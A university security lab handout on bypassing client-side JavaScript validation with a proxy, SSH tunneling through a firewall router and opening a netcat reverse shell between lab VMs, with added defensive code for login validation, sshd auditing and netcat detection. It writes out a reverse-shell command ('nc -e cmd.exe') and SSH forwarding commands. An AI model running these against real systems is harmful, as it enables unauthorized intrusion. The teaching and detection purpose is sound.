





A lab exercise focused on web and internet-based attacks, including using @stake WebProxy for monitoring web traffic, performing a denial of service (DoS) attack on SSL, and gaining remote shell access using netcat. Students will learn about SSL interactions with TCP, SSH tunneling, and protecting against SSH tunneling.
Typology: Lab Reports






Group Number: _________
Member Names: ___________________ _______________________
Date Assigned:
Date Due:
Last Edited:
Lab Authored By: Cambiz Mura and David Eakes
the theory and practical level.
Web traffic, how to perform a DoS on SSL, how to use SSH tunneling to access normally denied services on another subnet, and gaining remote shell access using netcat. Some of this lab is more theory-based, so there will be questions about that.
Red Hat Enterprise 4 WS
VMWare with 3 - Red Hat 7.2 images and 1 – Windows XP image
@stake WebProxy
NetCat for both Linux and Windows XP
Apache server on Red Hat 4.0 host machine
Copy the @stake WebProxy installer from the NAS server to your desktop and run the Installation program. Open Internet Explorer:
Unzip the contents of js_validation.zip file to the html directory where Apache is running on your RedHat 4.0 host machine (NOTE: Apache should have been installed in a prior lab).
Client-side validation using JavaScript is very common in web applications and web sites. However, it is not a solution to all the potential threats that may exist. Security professionals must take many precautions to ensure that would-be attackers do not find easy ways around a poorly implemented security scheme.
Open up Internet Explorer and enter 57.35.6.x/login.html in the URL field, where 57.35.6.x is the IP of the RedHat 7.2 machine that is running Apache (57.35.6.x).

Question 1.1 Enter any username and password combination and see what happens. Why?

Start @stake WebProxy by going to Start->Programs->webproxy and click on @stake WebProxy. Again, try to log in to the site (57.35.6.x/login.html), but now enter username: Henry and password: password. Of course you could log in if you are a valid user! But what if you are not?

Now open IE and enter http://webproxy in the URL field. @stake WebProxy comes with an easy-to-use interface that allows for much functionality. Click on the “RequestCache” tab. Now click on the “Show Cache” button.

Screenshot #1 - Take a screen capture of the WebProxy RequestCache page.

You should see the URL for the RedHat 4.0 machine, directed to the login.html page. Now click on the RequestEditor tab. Click on the page that includes the parameters for the submission of username and password. Enter whatever you wish for these fields (it doesn’t matter) and see what happens. Cool huh?

Question 1.2 Why were you able to log in? Can this tool be used in conjunction with common SQL injection attacks? How?

Question 1.3 What are some ways that web developers can incorporate more secure practices to prevent such attacks?
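The server-side counterpart to the JavaScript check, as an added example that is not part of the lab handout or its js_validation.zip files: the login decision is made only from data the server holds, so a request rewritten in a proxy gains nothing. The table layout, the function names and the `validated` field are assumptions made for illustration; the single account mirrors the lab's Henry/password pair.

```python
import hashlib
import hmac
import os
import sqlite3

def hash_pw(password: str, salt: bytes) -> bytes:
    # Salted, slow hash so the table never holds the plaintext password.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db() -> sqlite3.Connection:
    """In-memory user table with one constructed account (the lab's Henry)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, salt BLOB, pw BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("Henry", salt, hash_pw("password", salt)))
    return db

def server_login(db: sqlite3.Connection, form: dict) -> bool:
    """Decide the login from server-held data only.

    Every field in `form` is client-controlled: a proxy can rewrite it after
    the page's JavaScript has run, so nothing the browser "validated" counts.
    """
    user, pw = form.get("username"), form.get("password")
    if not (isinstance(user, str) and isinstance(pw, str)):
        return False
    if not (0 < len(user) <= 32 and 0 < len(pw) <= 128):
        return False
    # Bound parameter: the username is data, never part of the SQL text.
    row = db.execute("SELECT salt, pw FROM users WHERE name = ?",
                     (user,)).fetchone()
    if row is None:
        hash_pw(pw, b"\x00" * 16)  # do the same work as a real check
        return False
    salt, stored = row
    return hmac.compare_digest(hash_pw(pw, salt), stored)

if __name__ == "__main__":
    db = make_db()
    print(server_login(db, {"username": "Henry", "password": "password"}))
    # Edited request: arbitrary values plus a made-up "already validated" flag.
    print(server_login(db, {"username": "x", "password": "y", "validated": "1"}))
```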
Before starting the machines, go to the console of 7.2A and edit its settings. Add another Ethernet port. This port will get the name eth1.
Start all 3 RedHat7.2 virtual machines. You will now create 2 subnets. After they’re booted and logged in, go into 7.2A.
Set 7.2A: eth0’s IP to 57.35.6.x+1 where x is your assigned IP number.
Set 7.2A: eth1’s IP to 10.0.1.x+
Go to 7.2B.
Set 7.2B: eth0’s IP to 57.35.6.x+
Set 7.2B default gateway to 57.35.6.x+
Go to 7.2C.
Set 7.2C: eth0’s IP to 10.0.1.x+
Set 7.2C default gateway to 10.0.1.x+
7.2A is now a router, 7.2B is in Subnet 1, and 7.2C is in Subnet 2.
In 7.2A stop all services but sshd.
In 7.2B make sure httpd is started, and create a simple webpage and put it in www. Name it webpage.html

You will attempt to tunnel a connection from 7.2C to 7.2B. First try to access your webpage by opening a browser and attempt to connect to http://57.35.6.x+2/. If you set it up right, this should fail. Now, let’s try to access the webpage via SSH from 7.2C to 7.2B.

In 7.2B:
# ssh -l root -L 80:10.0.1.x+1:22 57.35.6.x+1 cat -

In 7.2C:
# ssh -l root -L 7777:57.35.6.x+2:22 10.0.1.x+1 cat -
Screenshot #3: Take a screenshot of your outcome.

This implies that someone on the other end has allowed you into the protected subnet. Possibly consider trying to input the command in 7.2B from a connection from 7.2C once you’ve derived its password (which would be user:root password:password). Imagine how, if someone’s password is compromised, this could be used to access a machine behind a protected firewall.
Question 3.1: How would you protect against SSH tunneling to compromise firewalls?
Question 3.2: What other applications of SSH tunneling are there?
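One way to check the router's sshd for the settings this exercise relies on (root login with a password, then a `-L` forward), as an added example that is not part of the lab handout. The two configuration samples are constructed, and the defaults table assumes stock OpenSSH behaviour (forwarding and password authentication enabled when unset); the parser follows sshd_config's rule that the first value seen for a keyword wins and treats `Match` blocks as outside the global settings.

```python
# Values that leave the lab's tunnel path open on the SSH server.
RISKY = {
    "allowtcpforwarding": {"yes", "all", "local"},  # "local" still permits ssh -L
    "permitrootlogin": {"yes"},
    "passwordauthentication": {"yes"},
}
# Assumed OpenSSH defaults for keywords missing from the file.
DEFAULTS = {"allowtcpforwarding": "yes", "passwordauthentication": "yes"}

def effective_settings(config_text: str) -> dict:
    """Global keyword -> value, honouring first-match-wins."""
    settings = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.replace("=", " ").split()
        key = parts[0].lower()  # keywords are case-insensitive
        if key == "match":      # conditional blocks are not global settings
            break
        if len(parts) > 1:
            settings.setdefault(key, parts[1].lower())
    return settings

def audit(config_text: str) -> list:
    """Return the risky keywords in effect, sorted by name."""
    eff = {**DEFAULTS, **effective_settings(config_text)}
    return sorted(k for k, bad in RISKY.items() if eff.get(k) in bad)

# Constructed sample: a router left the way the lab uses it.
LAB_ROUTER = """\
# sshd_config (constructed)
PermitRootLogin yes
PasswordAuthentication yes
"""

# Constructed sample: forwarding off, no root login, keys only.
HARDENED = """\
PermitRootLogin no
PasswordAuthentication no
AllowTcpForwarding no
"""

if __name__ == "__main__":
    print("lab router:", audit(LAB_ROUTER))
    print("hardened:  ", audit(HARDENED))
```

The sshd_config manual notes that disabling TCP forwarding does not improve security unless users are also denied shell access, since they can install their own forwarders; firewall rules limiting which hosts may reach sshd on the router matter as much as these settings.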
This section was inspired by Hacking by Numbers – Bootcamp Practice 08 from 2005. http://www.blackhat.com/html/bh-usa-06/train-bh-us-06-sp-b.html
You will need a Red Hat 7.2 virtual machine and a Windows XP virtual machine. Make sure nc.exe and class_uniload.exe are on your Desktop in Windows XP. Also, you will be using @stake WebProxy again.

Your IP addresses are as follows:
Red Hat 7.2: 57.35.6.x+
Windows XP: 57.35.6.x+
x represents your group’s IP root.
Open a terminal in Red Hat 7.2 and type this command:
# nc -lvn -p 7777
This sets netcat into listening (-l) mode. (-p specifies the port. I happen to like 7777, so that’s what I’ll use. -v means verbose mode. -n means don’t attempt a DNS lookup.)

Now, on your WinXP machine, open a command line, cd to the Desktop where you have nc.exe and type this command:
# nc -vn 57.35.6.x+1 7777
This connects to the netcat session on your Red Hat machine. If nothing fails, you get output that says you’ve made a connection, and both processes appear to wait, then everything has gone normally and you’re ready to proceed. Kill both running netcats with Ctrl-C.
Back in your terminal in Red Hat 4, type this command:
# nc -lvn -p 7777
Red Hat is now listening. You will now attack Windows using netcat on Windows with this command:
# nc -vn -e cmd.exe 57.35.6.x+1 7777
Take a look at your Red Hat 7.2 machine. If you did it properly, you should have a Windows XP command prompt in Linux! You now have all the privileges of the user you were logged in as on Windows.

Screenshot #4: Take a screenshot of your terminal in Red Hat 7.2.
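How the two netcat invocations above look to a defender reviewing process-creation records, as an added example that is not part of the lab handout: the plain connection test passes, while a command line that attaches a shell with -e is flagged. The record layout (host, pid, cmdline), the 192.0.2.x addresses and the flag-letter heuristic are constructed for illustration.

```python
import re

SHELL_NAMES = {"cmd.exe", "cmd", "powershell.exe", "sh", "bash"}
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
# -e alone or at the end of a bundle of netcat's no-argument flags (e.g. -vne).
EXEC_FLAG = re.compile(r"-[dlnrtuvz]*e")

def basename(path: str) -> str:
    """Last path component, lower-cased; handles both / and \\ separators."""
    return re.split(r"[\\/]", path)[-1].lower()

def exec_shell_target(cmdline: str):
    """Return the shell named after -e, or None if there is none."""
    toks = cmdline.split()
    for flag, arg in zip(toks, toks[1:]):
        if EXEC_FLAG.fullmatch(flag) and basename(arg) in SHELL_NAMES:
            return basename(arg)
    return None

def flag_events(events):
    """Return (host, pid, shell, peer) for each record that hands out a shell.

    peer is the first IPv4 argument, or None for a listener that waits
    for an inbound connection instead of dialling out.
    """
    alerts = []
    for ev in events:
        shell = exec_shell_target(ev["cmdline"])
        if shell is None:
            continue
        peers = [t for t in ev["cmdline"].split() if IPV4.fullmatch(t)]
        alerts.append((ev["host"], ev["pid"], shell, peers[0] if peers else None))
    return alerts

# Constructed records modelled on the commands in this section.
EVENTS = [
    {"host": "rh72", "pid": 877, "cmdline": "nc -lvn -p 7777"},
    {"host": "winxp", "pid": 1204, "cmdline": "nc -vn 192.0.2.11 7777"},
    {"host": "winxp", "pid": 1310, "cmdline": "nc -vn -e cmd.exe 192.0.2.11 7777"},
    {"host": "winxp", "pid": 1422,
     "cmdline": r"C:\tools\nc.exe -vne C:\WINDOWS\system32\cmd.exe 192.0.2.11 7777"},
]

if __name__ == "__main__":
    for alert in flag_events(EVENTS):
        print(alert)
```

Because the match is on the argument pattern rather than the image name, a renamed nc.exe is still caught; pairing it with an egress rule that blocks workstation connections to arbitrary ports covers the cases a command-line match misses.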
The following material is copied and modified from Lab 1.

Note: In this section you may need to hit the control and alt keys at the same time to release your mouse from VMware.

Now you will be installing virtual machines on your host machine. One of the ways of doing this is to create a new virtual machine in VMware and then install the OS on it, just as you would on a normal machine. If you already have one of these machines, you can make another machine from it by just copying the right directories. This cuts the installation time by a huge amount. You can copy both images at the same time in two different terminal windows.

Copies of the virtual machines, created by the TAs, are available on the NAS server. You will be creating virtual machines out of them. Follow the steps below to do this.

Make sure you have a vmware folder in root. If not, create a vmware directory by using the command
# mkdir /root/vmware

For this lab, you need 3 Red Hat 7.2 images. For this use the command
# mkdir /root/vmware/RedHat7.2-x
where x is a number.

Copy the “/mnt/nas4112/VMWare/RedHat7.2” directory to your “/root/vmware/RedHat7.2-x” directory by using the command
# cp -r /mnt/nas4112/VMWare/RedHat7.2 /root/Desktop/RedHat7.2-x

Type ‘vmware &’ in a terminal window to start VMWare. The '&' sign allows a process to run in the background, leaving the terminal open for use.

Follow the steps below to create a RedHat 7.2 virtual machine:
Select File->New->New Virtual machine to create a new virtual machine.
Choose Custom machine and click Next.
Select legacy since these images were created with an older version of VMware and click Next.
Select Linux for operating system and click Next.
Change the name of the machine to RedHat7.2-x and set the directory to /root/vmware/RedHat7.2- x /RedHat7.
You will be warned now that you already have a machine at that location; answer yes (this is what we just copied to there).
Leave the virtual memory setting as it is. If it gives you problems, you can increase or decrease the amount of memory for each machine later. Then click Next.
Select Bridged networking and click Next.
On the I/O adapter screen just click Next.
Choose “Use an existing virtual disk” and click Next.
Click Browse, go into the /root/vmware/RedHat7.2-x/RedHat7.2 directory and choose the file called “RedHat7.2.vmdk”.
Click Finish. This will create a RedHat 7.2 virtual machine.
For Internet Explorer: